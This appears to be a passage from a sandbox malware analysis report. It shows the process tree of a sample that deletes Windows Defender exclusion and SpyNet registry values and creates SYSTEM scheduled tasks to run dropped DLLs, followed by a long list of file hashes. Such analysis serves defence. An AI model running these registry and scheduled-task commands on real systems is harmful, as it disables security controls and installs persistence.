    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1888)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1688)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1532)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 592)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1412)
      cmdline: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mbQXQWfiU\evxFWP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VifYLfsFUZBOnFr" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1612)
      cmdline: schtasks /CREATE /TN "VifYLfsFUZBOnFr2" /F /xml "C:\Program Files (x86)\mbQXQWfiU\ONCvIzB.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1344)
      cmdline: schtasks /END /TN "VifYLfsFUZBOnFr"
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1668)
      cmdline: schtasks /DELETE /F /TN "VifYLfsFUZBOnFr"
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1040)
      cmdline: schtasks /CREATE /TN "aHccXdIPUxGykP" /F /xml "C:\Program Files (x86)\yaZvCAUzKqxU2\FUQPhRZ.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 916)
      cmdline: schtasks /CREATE /TN "xJAfwssuCzqxd2" /F /xml "C:\ProgramData\NRVKUIgAFoPoXkVB\UndaXrE.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 968)
      cmdline: schtasks /CREATE /TN "dOThrINOfEcGPPqKs2" /F /xml "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\VSHiTSx.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 912)
      cmdline: schtasks /CREATE /TN "ZuMFfllVmyQmxJihDZV2" /F /xml "C:\Program Files (x86)\pqzHHOUJlDLoC\chxTLJi.xml" /RU "SYSTEM"
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1780)
      cmdline: schtasks /CREATE /TN "WxeKxhacHpvHIAGHf" /SC once /ST 05:57:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll\",#1 /site_id 525403" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 268)
      cmdline: schtasks /run /I /tn "WxeKxhacHpvHIAGHf"
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1380)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 608)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 564)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1448)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1812)
      cmdline: schtasks /DELETE /F /TN "JApWNoHZsVVCavdbE"
  [L2] C:\Windows\system32\rundll32.EXE  (PID 2024)
    cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll",#1 /site_id 525403
    [L3] C:\Windows\SysWOW64\rundll32.exe  (PID 1720)
      cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TKLYYQlZQscfmQGO\NaXGkNRY\eBrDeYJ.dll",#1 /site_id 525403
      - Blocklisted process makes network request
      - Checks BIOS information in registry
      - Loads dropped DLL
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Modifies data under HKEY_USERS
      [L4] C:\Windows\SysWOW64\schtasks.exe  (PID 1048)
        cmdline: schtasks /DELETE /F /TN "WxeKxhacHpvHIAGHf"
[L1] C:\Windows\system32\gpscript.exe  (PID 1504)
  cmdline: gpscript.exe /RefreshSystemParam
[L1] C:\Windows\system32\gpscript.exe  (PID 1748)
  cmdline: gpscript.exe /RefreshSystemParam
[L1] C:\Windows\system32\gpscript.exe  (PID 1612)
  cmdline: gpscript.exe /RefreshSystemParam
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 2KB
  MD5: e85a08559d3b08f318c9abd2c5f6be9d
  SHA1: e149da16007e57a3586182826d23930ecc855be2
  SHA256: 90647a60c147377318c722c282fd98c1227b9be2392c074afa4829f655b9cf76
  SHA512: 07d29255f86975cf8a48209d4cecf9181064c89801bcbd0a3db9fafac259b3780a5066a2b9ddfca32b9a93e9cd18ab22c1f8d89bdd28ff9f45b0e49f70b9dd21
- Filesize: 2KB
  MD5: f0c10457887ef50d964dc254cc8e1479
  SHA1: 691efa16bdeaaa5d75d691f1c5b662f725e0e502
  SHA256: 5ff9a70a35ee8f5ea66a9b992214c08907a9c8253219833968a7f49497670823
  SHA512: 13d6df1505177aad5677ff2484f2e0f5766fb344ce7b310427fa9cbf246b3240d0a502a6d169dacaf9938c316ab9589b290046362b6ae41b06d9a6530306f43e
- Filesize: 2KB
  MD5: 766359d82927ae6607eca97fbe64b071
  SHA1: 2c64c818d53b23a2e950358422fb21609f193e04
  SHA256: 50af2355dbb524eb7b91313cd465b8f92bcca46ec2842d41c4d3bf781f1d45f3
  SHA512: aef20408e0f2cc29c6a1a5af6520accadaaf97c50dd4971fde09bcc6f6259632586e7c2cab212920d2063286ae521ee0a7e9a37590201d3ddf668e73e5716fca
- Filesize: 2KB
  MD5: ddac0c0468b66f7a96a5de6307972e8b
  SHA1: 7184dc325ffccd054ec77011f6e331b02753d6db
  SHA256: 1bba9b0fe79dd3190908e91ee01fefbf4fbc4537b193f201fb85e0d929e6d656
  SHA512: 7c39189cc560ebd68e325299f64d8eeff932c5bd06b60661156cf366463912af73eccc1b464984e91fd1fd476a93c4aa05a8f3711f5f2e810d1db2067b3141c2
- Filesize: 2KB
  MD5: 965cd1e4515a5b5365fc7028fe630435
  SHA1: 443e42d357fa6f2dcbd20d47a07d09f339ffc837
  SHA256: c12a295bf7726dc1fd99dce08275ed6f7402ef2761ac017bc444b33b6c6218a2
  SHA512: 5b5ebd17fa3a3654400e8539fad99d2720160d3a48a9b89c6b701a759a164234b6163a3e0273a67afbc100532774d95a2ddf8b3d99013de651764468b410c7c4
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 30bd213f136e9c6a96d3657ad54a5b45
  SHA1: c642b5639bc305cb3a48b30425d7ea0d424a0eb6
  SHA256: 45ba6e69dd5e9acba3e0016e3a8d26e0214cdfa5189698cfd78193c692f51c28
  SHA512: a0b5a3462875e533e0f81c493138b96909c97d49adbded486ab72edd8ccba95efedeb8181830b55d548bcd69dfc039d67a4c7bb015ee159a253e11ef103d793e
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 05eae8f9cf63744bca0ea4a23642683f
  SHA1: d4a20c788b8343e3e503d7d182500f5279989726
  SHA256: deb181ef14c5f3cc1e42271c97aeb29792e83486225f465367da0271739096b0
  SHA512: c1f0bf933c2282cab2942975dbba1fcc4e74eff137fc5bc283becc7b752cc4bcba29987195474fb52b237d042b210497611445960ce5b3c3548bd9d77072f79f
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 584372409a98af2dd04c4953b43a6fca
  SHA1: 2f27e866aa34c9e9a423572c702f522b33f61487
  SHA256: e435e11620176295b9b49017a2828591a4cca7bce11f3718997834d6db0c301a
  SHA512: 32c41063d00693aa53252f63b1d8e8bf23e21c6f19999670fe5ed12b12f622e910c580d0973aca364fdbd384d964feb689147a221327095cf769455dc6be7aeb
- Filesize: 8KB
  MD5: d85c9884f5b08f2129c2c8f935165a5a
  SHA1: c61c45f7785372e797f1bce89dd330bf1b6e7c84
  SHA256: b81d5bb6de6449fa55acfa45f1f4696b6849652bc1d824c40b0adf7c480d8451
  SHA512: 657cbb9a13fb32817034f6f1fe2d2a4f23033c7de4f230f96b4b46e6d0b02d4f1492a270399fe9e86e6c01a94b65310a329c8d4ddbbd7b434148a4977f1a0eb5
- Filesize: 6.2MB
  MD5: 7950d0e69cc8d5e3c721473548778772
  SHA1: 6b364e9874c100a9837566180145e0473047bcac
  SHA256: 60708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
  SHA512: 2c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 4KB
  MD5: a398cecd710773d5e6bf6976b8cba6c4
  SHA1: 435f07d85cb247b21f109045331bef26904fccaf
  SHA256: 9977fb4351f1925927678f2145ba0c963c7c1b743f04b6193b72e2e1f2f1b471
  SHA512: 24875fa32faef7320b39d36a0b7da5e76bfdf0380accfaaedcb41e36a1063af6a418f50ec81de8d3ac0f07432073f46c9f7e8d8e960d6b85b521566453fadff8
- Filesize: 268B
  MD5: a62ce44a33f1c05fc2d340ea0ca118a4
  SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
  SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
  SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.3MB
  MD5: 92de6a594267b9dd35e3937bb44ccfab
  SHA1: 5d51c774ecea5eb868c2894e9c8c40e7375f5dde
  SHA256: 9971938d3bfac3fcaf767a9b2dbc94c42ecf230aa857a0e18063d9412c862dcc
  SHA512: 200a6a611699f2abf81449df6ba6297758c2b38d26c402472560b48a59a50b151c689775260a62d01fac7c48c9c48f56351bc8698c763fd02d084f83413bae76
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.8MB
  MD5: 766e838b15a6b3db9c13bf512fa79209
  SHA1: 910f71c94030771cc665fb63d397f7d68a166a74
  SHA256: aa340749e1240e6eabead602a0b1c4a997b69a68a7f6fbb8a0b553f122a40872
  SHA512: eb0c25c6ac815d01440d8190f51624c917b5cd207dc6b1087d187d37dae97bae3f34255e2dfa9ed1d429834e6e0be952ca6963d202534909c608754f9f99de6e
- Filesize: 6.2MB
  MD5: 7950d0e69cc8d5e3c721473548778772
  SHA1: 6b364e9874c100a9837566180145e0473047bcac
  SHA256: 60708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
  SHA512: 2c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
- Filesize: 6.2MB
  MD5: 7950d0e69cc8d5e3c721473548778772
  SHA1: 6b364e9874c100a9837566180145e0473047bcac
  SHA256: 60708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
  SHA512: 2c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
- Filesize: 6.2MB
  MD5: 7950d0e69cc8d5e3c721473548778772
  SHA1: 6b364e9874c100a9837566180145e0473047bcac
  SHA256: 60708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
  SHA512: 2c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3
- Filesize: 6.2MB
  MD5: 7950d0e69cc8d5e3c721473548778772
  SHA1: 6b364e9874c100a9837566180145e0473047bcac
  SHA256: 60708b5b8dee74479d05fcae141f0e6ef2a31301374fb1525551a0b7d703c1b0
  SHA512: 2c48b5ecddefe638c5d7e109d2383eda2d916161ddd2ee5d6f69d7747dfcaed56f148b93fbc7f707bfdfe95013ec18d38951c2263a95f181b6917b936e09fda3